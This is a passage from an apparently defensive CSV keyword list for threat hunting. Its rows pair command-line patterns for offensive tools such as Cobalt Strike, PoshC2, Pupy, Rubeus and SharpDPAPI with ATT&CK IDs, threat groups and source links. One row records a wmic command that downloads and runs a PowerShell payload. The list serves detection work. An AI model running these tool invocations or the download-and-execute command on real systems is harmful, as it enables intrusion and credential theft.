T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -* -pipename_stager *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* pjl-info-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,0,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -* pjl-ready-message.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --plugin KeeFarceRebornPlugin.dll*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* polenum.py*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* pop3-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* pop3-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* pop3-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* popcalc.bin *,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -* popcalc64.bin *,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -* --port 1337*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,0,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -* port-states.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* PoshC2 *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -PoshC2Dir *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -PoshC2Dir *,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* pptp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* preauthscan /users:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* prepare.sh shell/mod_*.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -* --preset all -o syscalls_all*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,0,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -* --preset common -o syscalls_common*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,0,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -* PrincipalsAllowedToDelegateToAccount *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* Priv_Esc.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* --priv-esc*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*,greyware_tool_keyword,wmic,Threat Actors ran the following command to download and execute a PowerShell payload,T1059.001 - T1059.003 - T1569.002 - T1021.006,TA0002 - TA0005,N/A,N/A,Collection,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Process spawned with stolen token!*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -* --propagated*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* proxychains *,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -* ps /target:*.xml /unprotect*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* ptt /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* ptunnel-ng*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -* --publickey * --ecmdigits 25 --verbose --private*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --publickey * --uncipherfile ./ciphered\_file*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* puppet-naivesigning.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* PupyCredentials*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* pupylib.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupySocketStream*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyTCPClient*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyTCPServer*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyWebServer*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyWebSocketClient*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyWebSocketServer*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* pupyx64.lin*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* push_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* putterpanda.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* Pwn3d!*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* py2exe*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -* pyasn1 *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* pyasn1.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* pyLAPS.py*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential 